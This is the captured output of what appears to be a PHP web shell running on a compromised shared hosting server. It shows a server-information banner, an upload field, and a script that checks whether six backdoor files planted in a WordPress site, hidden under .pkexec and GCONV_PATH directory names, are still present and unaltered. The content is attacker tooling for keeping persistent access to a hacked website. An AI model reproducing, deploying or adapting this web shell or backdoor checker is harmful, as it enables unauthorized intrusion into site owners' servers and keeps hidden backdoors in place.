| Server IP : 198.54.126.135 / Your IP : 216.73.216.217 Web Server : Apache System : Linux host11.registrar-servers.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64 User : linearpo ( 12988) PHP Version : 8.1.34 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /dev/shm/ |
Upload File : |
<?php $r = '/home/thebookpublishin/public_html'; $x = ["/wp-includes/.pkexec/GCONV_PATH=./login.php"=>"bd@@111937@@1573",
"/6910c6/.pkexec/.pkexec/stalled_issues.php"=>"bd@@111711@@1610",
"/6910c6/.pkexec/HostBlacklist.php"=>"bd@@111970@@861",
"/6910c6/GCONV_PATH=./rss_reader.php"=>"bd@@111994@@904",
"/6910c6/.pkexec/GCONV_PATH=./studying.php"=>"bd@@111752@@852",
"/wp-includes/.pkexec/GCONV_PATH=./login.inc.php"=>"bd@@111597@@1010"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');